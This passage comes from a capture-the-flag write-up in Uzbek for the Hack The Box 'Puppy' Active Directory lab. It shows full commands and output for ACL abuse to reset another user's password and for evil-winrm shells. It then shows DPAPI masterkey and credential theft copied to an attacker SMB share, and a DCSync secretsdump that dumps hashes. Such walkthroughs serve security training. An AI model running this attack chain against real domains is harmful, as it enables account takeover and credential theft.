teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE

distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB


ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
nTFRSSubscriptions: CREATE_CHILD
classStore: CREATE_CHILD
ms-net-ieee-8023-GroupPolicy: CREATE_CHILD

Puppy 13
shadowFlag: WRITE
shadowExpire: WRITE
shadowInactive: WRITE
shadowWarning: WRITE
shadowMax: WRITE
shadowMin: WRITE
shadowLastChange: WRITE
loginShell: WRITE
unixHomeDirectory: WRITE
gecos: WRITE
gidNumber: WRITE
uidNumber: WRITE
msSFU30NisDomain: WRITE
msSFU30Name: WRITE
labeledURI: WRITE
userPKCS12: WRITE
preferredLanguage: WRITE
thumbnailLogo: WRITE
thumbnailPhoto: WRITE
middleName: WRITE
departmentNumber: WRITE
carLicense: WRITE
jpegPhoto: WRITE
audio: WRITE
pager: WRITE
mobile: WRITE
secretary: WRITE
homePhone: WRITE
manager: WRITE
photo: WRITE
roomNumber: WRITE
mail: WRITE
textEncodedORAddress: WRITE
uid: WRITE
userSMIMECertificate: WRITE
msDS-preferredDataLocation: WRITE
msDS-ObjectSoa: WRITE
msDS-SourceAnchor: WRITE
msDS-KeyCredentialLink: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-AssignedAuthNPolicy: WRITE
msDS-AssignedAuthNPolicySilo: WRITE
msDS-SyncServerUrl: WRITE
msDS-CloudAnchor: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE

Puppy 14
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
msDS-cloudExtensionAttribute6: WRITE
msDS-cloudExtensionAttribute5: WRITE
msDS-cloudExtensionAttribute4: WRITE
msDS-cloudExtensionAttribute3: WRITE
msDS-cloudExtensionAttribute2: WRITE
msDS-cloudExtensionAttribute1: WRITE
msDS-GeoCoordinatesLongitude: WRITE
msDS-GeoCoordinatesLatitude: WRITE
msDS-GeoCoordinatesAltitude: WRITE
msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msDS-PrimaryComputer: WRITE
msTSSecondaryDesktops: WRITE
msTSPrimaryDesktop: WRITE
msDS-LastKnownRDN: WRITE
isRecycled: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-NcType: WRITE
msTSLSProperty02: WRITE
msTSLSProperty01: WRITE
msTSManagingLS4: WRITE
msTSLicenseVersion4: WRITE
msTSExpireDate4: WRITE
msTSManagingLS3: WRITE
msTSLicenseVersion3: WRITE
msTSExpireDate3: WRITE
msTSManagingLS2: WRITE
msTSLicenseVersion2: WRITE
msTSExpireDate2: WRITE
msDS-HABSeniorityIndex: WRITE
msTSManagingLS: WRITE
msTSLicenseVersion: WRITE
msTSExpireDate: WRITE
msTSProperty02: WRITE
msTSProperty01: WRITE
msTSInitialProgram: WRITE
msTSWorkDirectory: WRITE
msTSDefaultToMainPrinter: WRITE
msTSConnectPrinterDrives: WRITE
msTSConnectClientDrives: WRITE
msTSBrokenConnectionAction: WRITE
msTSReconnectionAction: WRITE
msTSMaxIdleTime: WRITE
msTSMaxConnectionTime: WRITE
msTSMaxDisconnectionTime: WRITE
msTSRemoteControl: WRITE
msTSAllowLogon: WRITE
msTSHomeDrive: WRITE
msTSHomeDirectory: WRITE
msTSProfilePath: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE

Puppy 15
msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msDS-AuthenticatedAtDC: WRITE
msDS-PhoneticDisplayName: WRITE
msDS-PhoneticCompanyName: WRITE
msDS-PhoneticDepartment: WRITE
msDS-PhoneticLastName: WRITE
msDS-PhoneticFirstName: WRITE
msDS-SecondaryKrbTgtNumber: WRITE
msRADIUS-SavedFramedIpv6Route: WRITE
msRADIUS-FramedIpv6Route: WRITE
msRADIUS-SavedFramedIpv6Prefix: WRITE
msRADIUS-FramedIpv6Prefix: WRITE
msRADIUS-SavedFramedInterfaceId: WRITE
msRADIUS-FramedInterfaceId: WRITE
unixUserPassword: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
msPKIRoamingTimeStamp: WRITE
msDS-SourceObjectDN: WRITE
msDRM-IdentityCertificate: WRITE
msDS-AllowedToDelegateTo: WRITE
msIIS-FTPDir: WRITE
msIIS-FTPRoot: WRITE
lastLogonTimestamp: WRITE
msDS-Site-Affinity: WRITE
msDS-Cached-Membership-Time-Stamp: WRITE
msDS-Cached-Membership: WRITE
msCOM-UserPartitionSetLink: WRITE
mS-DS-CreatorSID: WRITE
mS-DS-ConsistencyChildCount: WRITE
mS-DS-ConsistencyGuid: WRITE
otherWellKnownObjects: WRITE
dSCorePropagationData: WRITE
accountNameHistory: WRITE
proxiedObjectName: WRITE
msRASSavedFramedRoute: WRITE
msRASSavedFramedIPAddress: WRITE
msRASSavedCallbackNumber: WRITE
msRADIUSServiceType: WRITE
msRADIUSFramedRoute: WRITE
msRADIUSFramedIPAddress: WRITE
msRADIUSCallbackNumber: WRITE
msNPSavedCallingStationID: WRITE
msNPCallingStationID: WRITE
msNPAllowDialin: WRITE
mSMQSignCertificatesMig: WRITE
mSMQDigestsMig: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
uSNSource: WRITE
terminalServer: WRITE

Puppy 16
isCriticalSystemObject: WRITE
altSecurityIdentities: WRITE
lastKnownParent: WRITE
aCSPolicyName: WRITE
servicePrincipalName: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
url: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
partialAttributeDeletionList: WRITE
lockoutTime: WRITE
userPrincipalName: WRITE
legacyExchangeDN: WRITE
assistant: WRITE
otherMailbox: WRITE
mhsORAddress: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
showInAddressBook: WRITE
partialAttributeSet: WRITE
wellKnownObjects: WRITE
sIDHistory: WRITE
dynamicLDAPServer: WRITE
systemFlags: WRITE
fSMORoleOwner: WRITE
desktopProfile: WRITE
groupPriority: WRITE
groupsToIgnore: WRITE
sAMAccountType: WRITE
wbemPath: WRITE
division: WRITE
defaultClassStore: WRITE
controlAccessRights: WRITE
logonCount: WRITE
groupMembershipSAM: WRITE
lmPwdHistory: WRITE
accountExpires: WRITE
comment: WRITE
rid: WRITE
adminCount: WRITE
revision: WRITE
operatorCount: WRITE
profilePath: WRITE
userParameters: WRITE
supplementalCredentials: WRITE
securityIdentifier: WRITE
primaryGroupID: WRITE
preferredOU: WRITE
pwdLastSet: WRITE
ntPwdHistory: WRITE

Puppy 17
otherLoginWorkstations: WRITE
unicodePwd: WRITE
userWorkstations: WRITE
maxStorage: WRITE
logonWorkstation: WRITE
logonHours: WRITE
scriptPath: WRITE
localeID: WRITE
dBCSPwd: WRITE
lastLogon: WRITE
lastLogoff: WRITE
badPasswordTime: WRITE
homeDrive: WRITE
homeDirectory: WRITE
flags: WRITE
employeeID: WRITE
countryCode: WRITE
codePage: WRITE
badPwdCount: WRITE
userAccountControl: WRITE
replUpToDateVector: WRITE
replPropertyMetaData: WRITE
objectGUID: WRITE
name: WRITE
homePostalAddress: WRITE
personalTitle: WRITE
employeeType: WRITE
employeeNumber: WRITE
msExchHouseIdentifier: WRITE
msExchLabeledURI: WRITE
USNIntersite: WRITE
wWWHomePage: WRITE
networkAddress: WRITE
msExchAssistantName: WRITE
displayNamePrintable: WRITE
garbageCollPeriod: WRITE
otherHomePhone: WRITE
uSNDSALastObjRemoved: WRITE
streetAddress: WRITE
extensionName: WRITE
adminDescription: WRITE
proxyAddresses: WRITE
adminDisplayName: WRITE
showInAdvancedViewOnly: WRITE
company: WRITE
department: WRITE
co: WRITE
uSNLastObjRem: WRITE
uSNChanged: WRITE
otherPager: WRITE
repsFrom: WRITE
repsTo: WRITE
info: WRITE
objectVersion: WRITE

Puppy 18
dSASignature: WRITE
isDeleted: WRITE
uSNCreated: WRITE
otherTelephone: WRITE
displayName: WRITE
subRefs: WRITE
whenChanged: WRITE
whenCreated: WRITE
attributeCertificateAttribute: WRITE
houseIdentifier: WRITE
dn: WRITE
x500uniqueIdentifier: WRITE
generationQualifier: WRITE
initials: WRITE
givenName: WRITE
userCertificate: WRITE
userPassword: WRITE
seeAlso: WRITE
preferredDeliveryMethod: WRITE
destinationIndicator: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
businessCategory: WRITE
description: WRITE
title: WRITE
ou: WRITE
o: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE
serialNumber: WRITE
sn: WRITE
objectCategory: WRITE
sAMAccountName: WRITE
objectSid: WRITE
nTSecurityDescriptor: WRITE
instanceType: WRITE
cn: WRITE
objectClass: WRITE
OWNER: WRITE
DACL: WRITE

Chuquroq va aniqroq qidiramiz

Puppy 19
┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail | grep -A 20
"distinguishedName: CN=.*DC=PUPPY,DC=HTB" | grep -B 20 "WRITE"

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE

distinguishedName: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB


thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
--
distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
nTFRSSubscriptions: CREATE_CHILD
classStore: CREATE_CHILD
ms-net-ieee-8023-GroupPolicy: CREATE_CHILD
shadowFlag: WRITE
shadowExpire: WRITE
shadowInactive: WRITE
shadowWarning: WRITE
shadowMax: WRITE
shadowMin: WRITE
shadowLastChange: WRITE
loginShell: WRITE
unixHomeDirectory: WRITE
gecos: WRITE
gidNumber: WRITE
uidNumber: WRITE
msSFU30NisDomain: WRITE
msSFU30Name: WRITE
labeledURI: WRITE
userPKCS12: WRITE

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]

Puppy 20
└─$ bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail | grep -E "di
stinguishedName: CN=.*DC=PUPPY,DC=HTB" -A 10

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE

distinguishedName: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB


thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
--
distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
nTFRSSubscriptions: CREATE_CHILD
classStore: CREATE_CHILD
ms-net-ieee-8023-GroupPolicy: CREATE_CHILD
shadowFlag: WRITE
shadowExpire: WRITE
shadowInactive: WRITE
shadowWarning: WRITE
shadowMax: WRITE
shadowMin: WRITE

Adam D. Silver useri ustidan yozish huquqi borakan

https://www.hackingarticles.in/forcechangepassword-active-directory-abuse/

rpcclient bilan passwordni o’zgartiramiz


┌──(kali kali)-[~]
└─$ rpcclient -U 'puppy.htb\Ant.Edwards%Antman2025!' xx.xx.xx.xx

rpcclient $> setuserinfo ADAM.SILVER 23 Password@987


rpcclient $>

Puppy 21
┌──(kali㉿kali)-[~]
└─$ nxc smb xx.xx.xx.xx -u 'ADAM.SILVER' -p 'Password@987'
SMB xx.xx.xx.xx 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.H
TB) (signing:True) (SMBv1:False)
SMB xx.xx.xx.xx 445 DC [+] PUPPY.HTB\ADAM.SILVER:Password@987

┌──(kali㉿kali)-[~]
└─$ crackmapexec winrm 10.10.11.70 -u 'ADAM.SILVER' -p 'Password@987' -d PUPPY.HTB

HTTP xx.xx.xx.xx 5985 xx.xx.xx.xx [*] http://xx.xx.xx.xx:5985/wsman


/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM xx.xx.xx.xx 5985 xx.xx.xx.xx [+] PUPPY.HTB\ADAM.SILVER:Password@987 (Pwn3d!)

bloodyAD bilan passwordni o’zgartirish va verbose javobli usuli


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ bloodyAD -u ant.edwards -p 'Antman2025!' -d puppy.htb --dc-ip xx.xx.xx.xx set password adam.silver 'Passw
ord@987'
[+] Password changed successfully!

impacket-changepasswd bilan boshqa usul

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ impacket-changepasswd puppy.htb/[email protected] -newpass 'Password@987' -altuser puppy.htb/an
t.edwards -altpass Antman2025! -reset
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Setting the password of puppy.htb\adam.silver as puppy.htb\ant.edwards


[*] Connecting to DCE/RPC as puppy.htb\ant.edwards
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.

Initial Access (Kirish huquqiga erishish)


Biz password o’zgartira oldik, winrm bilan bog’lanish mumkun ekan va bog’lanamiz

Puppy 22

┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ evil-winrm -i xx.xx.xx.xx -u 'ADAM.SILVER' -p 'Password@987'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplem
ented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-co


mpletion

Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> dir

Directory: C:\Users\adam.silver\Desktop

Mode LastWriteTime Length Name


---- ------------- ------ ----
-a---- 2/28/2025 12:31 PM 2312 Microsoft Edge.lnk
-ar--- 5/17/2025 9:56 PM 34 user.txt

*Evil-WinRM* PS C:\Users\adam.silver\Desktop> type user.txt


b45203f370ae16d7f2e70540f2023a764
*Evil-WinRM* PS C:\Users\adam.silver\Desktop>

Privilage Escalation (Huquqlarni oshirish)


Bloodhound bilan scan qilamiz

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy/edward]
└─$ ntpdate -u xx.xx.xx.xx | bloodhound-python -dc DC.PUPPY.HTB -u 'ADAM.SILVER' -p 'Password@987' -d PUP
PY.HTB -c All -o bloodhound_results.json -ns xx.xx.xx.xx

CLOCK: step_systime: Operation not permitted


INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_
ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts

Puppy 23
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 20S

Evil-WinRM bilan bog’lanib enumuration qilamiz

*Evil-WinRM* PS C:\Backups> dir

Directory: C:\Backups

Mode LastWriteTime Length Name


---- ------------- ------ ----
-a---- 3/8/2025 8:22 AM 4639546 site-backup-2024-12-30.zip

*Evil-WinRM* PS C:\Backups> download site-backup-2024-12-30.zip

Info: Downloading C:\Backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip

Info: Download successful!


*Evil-WinRM* PS C:\Backups>

Backups ichida site-backup-2024-12-30.zip borakan o’tqazib ichini tekshiramiz

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy/puppy]
└─$ ll
total 20
drwxrwxr-x 6 kali kali 4096 Dec 31 1979 assets
drwxrwxr-x 2 kali kali 4096 Dec 31 1979 images
-rw-rw-r-- 1 kali kali 7258 Dec 31 1979 index.html
-rw-r--r-- 1 kali kali 864 Dec 31 1979 nms-auth-config.xml.bak


┌──(kali kali)-[~/Desktop/HTB/Puppy/puppy]
└─$ cat nms-auth-config.xml.bak
<?xml version="1.0" encoding="UTF-8"?>

Puppy 24
<ldap-config>
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
<user-attributes>
<attribute name="username" ldap-attribute="uid" />
<attribute name="firstName" ldap-attribute="givenName" />
<attribute name="lastName" ldap-attribute="sn" />
<attribute name="email" ldap-attribute="mail" />
</user-attributes>
<group-attributes>
<attribute name="groupName" ldap-attribute="cn" />
<attribute name="groupMember" ldap-attribute="member" />
</group-attributes>
<search-filter>
<filter>(&(objectClass=person)(uid=%s))</filter>
</search-filter>
</ldap-config>

nms-auth-config.xml.bak ichida password va userni topdik


name: steph.cooper
password :
ChefSteph2025!
Winrm qilib bog’lanishim mumkunligini tekshiramiz

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ crackmapexec winrm xx.xx.xx.xx -u 'steph.cooper' -p 'ChefSteph2025!' -d PUPPY.HTB
HTTP xx.xx.xx.xx 5985 xx.xx.xx.xx [*] http://xx.xx.xx.xx:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM xx.xx.xx.xx 5985 xx.xx.xx.xx [+] PUPPY.HTB\steph.cooper:ChefSteph2025! (Pwn3d!)

evil-winrm qila olaramiz va bog’lanib enimuration qilamiz

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ evil-winrm -i xx.xx.xx.xx -u 'steph.cooper' -p 'ChefSteph2025!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplem
ented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-co


mpletion

Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\steph.cooper\Documents>
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> dir C:\Users\steph.cooper\AppD

Puppy 25
ata\Roaming\Microsoft\Protect\

Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect

Mode LastWriteTime Length Name


---- ------------- ------ ----
d---s- 2/23/2025 2:36 PM S-1-5-21-1487982659-1829050783-2281216199-1107

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> cd S-1-5-21-1487982659-182905078


3-2281216199-1107
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2
281216199-1107> ls -force

Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-22812
16199-1107

Mode LastWriteTime Length Name


---- ------------- ------ ----
-a-hs- 3/8/2025 7:40 AM 740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs- 2/23/2025 2:36 PM 24 Preferred

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2
281216199-1107> copy "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050
783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407" \\xx.xx.14.xx\share\masterkey_blob

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2
281216199-1107>

===================================================================================
==

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> ls -Force

Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials

Mode LastWriteTime Length Name


---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9

*Evil-WinRM* PS C:\Users\steph.cooper\Documents> copy "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Cr


edentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9" \\xx.xx.14.xx\share\credential_blob

masterkey (shifrlash kaliti) faylini topdik va uni o’zimizga ko’chirdik

Puppy 26
credential blob (foydalanuvchi credential ma’lumotlari, parollar yoki tokenlar saqlanadigan fayl) ham ko’chirdik

Masterkey — DPAPI shifrlash va decrypt qilishda ishlatiladigan maxfiy kalit.

Credential blob — foydalanuvchining saqlangan credential (parol yoki token) ma’lumotlari.

DPAPI bilan himoyalangan credential ma’lumotlarini offlayn parollarni yechish (decrypt) uchun ishlatamiz

SMB server ishga tushirib bu filelarni ko’chirib olamiz tepadegi jarayon paytida bu yoniq turishi kerak va biz create
qilgan share papkasiga tushadi Masterkey va Credential blob

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ mkdir -p ./share

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ impacket-smbserver share ./share -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Config file parsed


[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (xx.xx.xx.xx,60046)
[*] AUTHENTICATE_MESSAGE (\,DC)
[*] User DC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:share)
[*] Closing down connection (xx.xx.xx.xx,60046)
[*] Remaining connections []
[*] Incoming connection (1xx.xx.xx.xx,60098)
[*] AUTHENTICATE_MESSAGE (\,DC)
[*] User DC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:share)
[*] Disconnecting Share(1:share)
[*] Closing down connection (xx.xx.xx.xx,60098)
[*] Remaining connections []

DPAPI skripti bilan masterkey_blob fileni dekript qilamiz

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy/share]
└─$ ll
total 8
-rwxrwxr-x 1 kali kali 414 Mar 8 10:54 credential_blob
-rwxrwxr-x 1 kali kali 740 Mar 8 10:40 masterkey_blob


┌──(kali kali)-[~/Desktop/HTB/Puppy/share]
└─$ python3 /usr/share/doc/python3-impacket/examples/dpapi.py masterkey -file masterkey_blob -password 'Che
fSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Puppy 27
[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)


Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab
8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

Endi DPAPI credential blob faylini masterkey yordamida dekodlaymiz


Decrypted key:
0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy/share]
└─$ python3 /usr/share/doc/python3-impacket/examples/dpapi.py credential -f credential_blob -key 0xd9a570722f
baf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28
408d8d9cbfdcaf319e9c84

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!

Biz user va passwordni topdik


user: steph.cooper_adm

password: FivethChipOnItsWay2025!

Endi bloodhound bilan scan qilamiz


┌──(kali kali)-[~/Desktop/HTB/Puppy/edward]
└─$ bloodhound-python -dc DC.PUPPY.HTB -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!' -d PUPPY.HTB -
c All -o bloodhound_results.json -ns xx.xx.xx.xx

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)


INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_
ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains

Puppy 28
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 21 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 21S

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/edward]
└─$ zip bloodhound_results.zip bloodhound_results.json_20250517180922_*.json
adding: bloodhound_results.json_20250517180922_computers.json (deflated 74%)
adding: bloodhound_results.json_20250517180922_containers.json (deflated 93%)
adding: bloodhound_results.json_20250517180922_domains.json (deflated 77%)
adding: bloodhound_results.json_20250517180922_gpos.json (deflated 89%)
adding: bloodhound_results.json_20250517180922_groups.json (deflated 94%)
adding: bloodhound_results.json_20250517180922_ous.json (deflated 83%)
adding: bloodhound_results.json_20250517180922_users.json (deflated 93%)

steph.cooper_adm userida DCSync huquqi borakan. Biz bu huquqdan foydalanib administrator hashini olishga yani
DCSync hujumini amalga oshiramiz

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/edward]
└─$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py PUPPY.HTB/steph.cooper_adm:'FivethC
hipOnItsWay2025!'@xx.xx.xx.xx
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6


[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.

Puppy 29
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
